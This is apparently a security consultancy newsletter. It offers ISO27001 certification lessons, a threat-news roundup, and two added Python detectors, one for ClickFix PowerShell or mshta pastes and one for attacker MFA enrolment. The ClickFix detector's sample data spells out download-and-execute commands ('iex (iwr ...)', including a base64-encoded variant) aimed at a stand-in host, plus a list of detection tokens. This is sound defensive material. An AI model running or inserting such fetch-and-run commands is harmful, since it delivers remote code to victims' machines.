#NSBCS.111 - 3 lessons from achieving ISO27001 ourselves
After helping numerous clients achieve ISO27001 certification over the years, NSB Cyber went through the ISO audit process late last year and achieved our own certification.
Being on the receiving end of the audit was a valuable reminder that ISO27001 is less about having the right documents, and more about how your organisation actually operates day to day. A few lessons stood out, particularly ones we see trip organisations up again and again.
1. ISO27001 is not an IT project
This is one of the most common mistakes we see. ISO27001 is a business wide management system, not a security or IT initiative. Governance, risk ownership, leadership involvement, and operational processes all matter. When certification is treated as an IT exercise, gaps tend to surface quickly once auditors start asking questions outside the tech stack.
2. Copying someone else’s ISMS rarely works
Templates can be helpful, but they are not a shortcut to certification. Controls need to reflect your organisation’s context, risk profile, and operating model. Auditors are very good at spotting shelfware, and teams struggle to follow processes that were never designed for how they actually work.
3. People are part of the control environment
Policies and tools alone are not enough. Auditors will look closely at whether people understand their roles, responsibilities, and the intent behind key controls. If your team can’t explain how something works in practice, it’s usually a sign that the control hasn’t been embedded.
Going through ISO27001 ourselves reinforced why we continue to recommend it to clients. When approached pragmatically, it becomes a genuinely useful framework for strengthening governance and cyber resilience, not just a certificate on the wall.
Looking to strengthen your cyber resilience? Book a meeting with our team today.
You can also explore our blog on refreshing your ISO27001 program: Cutting Through the Noise: Refreshing Your ISO 27001 Program.
What we read this week
Pro-Russian group Noname057(16) launched DDoS attacks on Milano Cortina 2026 Winter Olympics - Italian authorities have disrupted a series of Russian-linked cyberattacks targeting Foreign Ministry offices abroad, Winter Olympics–related websites, and hotels in Cortina d’Ampezzo, according to Foreign Minister Antonio Tajani. The pro-Russian hacktivist group Noname057(16) claimed responsibility for the distributed denial of service (DDoS) activity, framing it as retaliation for Italy’s support for Ukraine and listing diplomatic and hospitality targets in multiple countries. While organisers of Milano Cortina 2026 expect further attempts, the incidents to date have had limited impact due to mitigation by Italian authorities and the National Cybersecurity Agency.
Security Brief: Threat Actors Take Taxes Into Account - Proofpoint researchers have identified a surge in phishing campaigns and malicious domains impersonating tax agencies and financial organisations, aligning with seasonal tax deadlines in the United Kingdom and the United States. These lures mimic government bodies and services like Intuit, urging users to engage with fake sites for tax filing or documentation. Campaigns often use generic sender addresses with tax-themed URLs leading to credential harvesting pages. The infrastructure supports both phishing and malware delivery, with a focus on accounting and payment related entities.
LummaStealer Infections Surge After CastleLoader Malware Campaigns - Researchers have observed a renewed surge in LummaStealer (LummaC2) infections, driven by social engineering campaigns that abuse the ClickFix technique and deliver a malware loader called CastleLoader. Although LummaStealer's malware-as-a-service (MaaS) infrastructure was heavily disrupted in May 2025 through coordinated law enforcement action, activity resumed later in the year and scaled rapidly between December 2025 and January 2026, according to Bitdefender. CastleLoader acts as a central delivery mechanism, using heavily obfuscated, in-memory execution and evasion checks to deploy LummaStealer and other infostealers or remote-access tools. ClickFix campaigns typically lure users to fake verification or CAPTCHA pages that trick them into running malicious PowerShell commands, which then fetch and execute CastleLoader.
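The ClickFix pattern described above has a distinctive shape in process-creation telemetry: the victim pastes the command into the Win+R Run dialog or a terminal, so an interactive shell is spawned by explorer.exe with a command line that downloads and evaluates remote content. The detector below is an added example, not code from the newsletter or from Bitdefender's report; the Sysmon-style event records, hostnames and the field names (parent, image, cmdline) are constructed for illustration, and the rule thresholds are assumptions.

```python
"""Flag ClickFix-style process creations: an interactive shell launched by
explorer.exe whose command line (plain or -EncodedCommand) fetches or evaluates
remote content. Added example with constructed sample events."""
import base64
import re
from typing import Optional

# Shells a Run-dialog paste would start; explorer.exe is the Run dialog's parent.
INTERACTIVE_SHELLS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                      "wscript.exe", "cscript.exe")
RUN_DIALOG_PARENTS = ("explorer.exe",)

# Tokens that download or evaluate remote content. One of these in the command
# line of an explorer-spawned shell is the ClickFix tell-tale.
REMOTE_EXEC_TOKENS = re.compile(
    r"(iex\b|invoke-expression|iwr\b|invoke-webrequest|invoke-restmethod|"
    r"\birm\b|downloadstring|curl\b|https?://|\.hta\b)", re.IGNORECASE)

# PowerShell accepts -e, -ec, -en, -enc and -EncodedCommand (longest first).
ENCODED_FLAG = re.compile(
    r"(?:-|/)(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (PowerShell encodes it as
    base64 over UTF-16LE), or None if there is none or it does not decode."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_clickfix(event: dict) -> bool:
    """True when an interactive shell is spawned from explorer.exe with a
    command line (after decoding any -EncodedCommand) that fetches or
    evaluates remote content."""
    if basename(event["parent"]) not in RUN_DIALOG_PARENTS:
        return False
    if basename(event["image"]) not in INTERACTIVE_SHELLS:
        return False
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + " " + decoded
    return bool(REMOTE_EXEC_TOKENS.search(text))


def find_clickfix(events) -> list:
    """Indices of the events that match the ClickFix pattern."""
    return [i for i, e in enumerate(events) if is_clickfix(e)]


# Constructed sample events (Sysmon Event ID 1 shape). example.invalid is a
# reserved, non-resolving name used only for the example.
_ENCODED = base64.b64encode(
    "iex (iwr 'https://example.invalid/c')".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -w hidden -nop -c \"iex (iwr 'https://example.invalid/verify.txt' -UseBasicParsing)\""},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/captcha.hta"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe", "image": PS,
     "cmdline": "powershell -NoProfile -File build.ps1"},          # developer, not explorer
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},                                     # benign Run-dialog use
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": f"powershell -nop -w hidden -enc {_ENCODED}"},    # encoded ClickFix paste
]

if __name__ == "__main__":
    for i in find_clickfix(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['cmdline'][:80]}")
```

The explorer.exe parent is what separates a user paste from scripted automation, and decoding -EncodedCommand matters because the lure pages increasingly hand the victim a base64 blob rather than readable PowerShell. Tune the shell and token lists to your estate; help-desk tooling that legitimately launches PowerShell from explorer.exe is the usual source of false positives.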
Russian Hackers Attacking European Maritime and Transport Orgs Using Microsoft Office Exploit - Researchers have identified a new wave of cyber espionage activity linked to APT28, also known as Fancy Bear, involving the rapid exploitation of a recently disclosed Microsoft Office vulnerability. Reporting indicates the campaign targeted government, diplomatic, maritime and transportation organisations across Ukraine and multiple European and Middle Eastern countries through a concentrated 72-hour spear phishing operation. The attackers delivered malicious Office documents via compromised government email accounts and, once executed, the malware chain deployed tools to harvest email data and establish persistent backdoor access, while abusing legitimate cloud services to mask command-and-control traffic.
Harvard, UPenn Data Leaked in ShinyHunters Shakedown - The cyber-extortion group ShinyHunters has claimed responsibility for late-2025 breaches at Harvard University and the University of Pennsylvania, alleging the theft of more than two million records that were later posted on a dark-web leak site. Analysis by threat intelligence firm Hudson Rock suggests the Harvard data includes admissions and fundraising details that expose social and financial networks, including information on high-value donors and their families. Investigators link the activity to a broader vishing campaign in which attackers impersonate IT staff, deceive victims via fake Okta or Microsoft Entra login pages, and enroll attacker-controlled devices into MFA to gain access to identity systems and cloud applications.
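The vishing chain described above ends with the attacker enrolling their own device as an MFA factor, which leaves a detectable trace in the identity provider's log: a factor activation that follows a sign-in from an address the user has never used. The check below is an added example, not code from the newsletter, Hudson Rock or Okta; it uses Okta-style eventType names (user.session.start, user.mfa.factor.activate) over constructed records, and the per-user IP baseline, field names and 30-minute window are assumptions to adapt to your own tenant.

```python
"""Flag MFA factor enrolments that follow a sign-in from an IP outside the
user's baseline within a short window. Added example with constructed,
Okta-style events."""
from datetime import datetime, timedelta

# Known-good source addresses per user, e.g. built from the previous 90 days
# of successful sign-ins (assumed baseline for the example).
BASELINE_IPS = {
    "alice@example.invalid": {"203.0.113.10"},
    "bob@example.invalid": {"198.51.100.7"},
}

# Constructed events in the shape of Okta System Log entries (subset of fields).
SAMPLE_EVENTS = [
    {"ts": "2026-02-10T08:01:00Z", "eventType": "user.session.start",
     "actor": "alice@example.invalid", "ip": "203.0.113.10"},
    {"ts": "2026-02-10T09:10:00Z", "eventType": "user.mfa.factor.activate",
     "actor": "alice@example.invalid", "ip": "203.0.113.10"},   # enrolment from known IP
    {"ts": "2026-02-10T13:22:05Z", "eventType": "user.session.start",
     "actor": "bob@example.invalid", "ip": "192.0.2.44"},        # new IP after vishing call
    {"ts": "2026-02-10T13:24:40Z", "eventType": "user.mfa.factor.activate",
     "actor": "bob@example.invalid", "ip": "192.0.2.44"},        # attacker's device enrolled
]


def parse_ts(ts: str) -> datetime:
    """Parse the UTC timestamp format used in the constructed events."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def flag_suspicious_enrolments(events, baseline, window=timedelta(minutes=30)):
    """Return (actor, ip, ts) for each factor activation from an IP not in the
    actor's baseline that was preceded, within `window`, by a session start
    from that same IP. Events are processed in timestamp order."""
    ordered = sorted(events, key=lambda e: parse_ts(e["ts"]))
    recent_logins = {}   # (actor, ip) -> time of most recent session start
    flagged = []
    for e in ordered:
        key = (e["actor"], e["ip"])
        when = parse_ts(e["ts"])
        if e["eventType"] == "user.session.start":
            recent_logins[key] = when
            continue
        if e["eventType"] != "user.mfa.factor.activate":
            continue
        if e["ip"] in baseline.get(e["actor"], set()):
            continue                      # known address, routine re-enrolment
        login_at = recent_logins.get(key)
        if login_at is not None and when - login_at <= window:
            flagged.append((e["actor"], e["ip"], e["ts"]))
    return flagged


if __name__ == "__main__":
    for actor, ip, ts in flag_suspicious_enrolments(SAMPLE_EVENTS, BASELINE_IPS):
        print(f"{ts} new MFA factor for {actor} from unfamiliar IP {ip}")
```

Alice's enrolment is left alone because it comes from an address in her baseline; Bob's is flagged because both the sign-in and the enrolment come from an address he has never used, minutes apart, which is exactly the sequence the vishing playbook produces. In production, pair this with the help-desk ticket queue: a flagged enrolment with no matching reset request is a strong signal.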
References
https://securityaffairs.com/187654/hacktivism/pro-russian-group-noname05716-launched-ddos-attacks-on-milano-cortina-2026-winter-olympics.html
https://www.proofpoint.com/us/blog/threat-insight/security-brief-threat-actors-take-taxes-account
https://www.bleepingcomputer.com/news/security/lummastealer-infections-surge-after-castleloader-malware-campaigns/
https://therecord.media/russian-hackers-microsoft-office-europe
https://www.bankinfosecurity.com/harvard-upenn-data-leaked-in-shinyhunters-shakedown-a-30677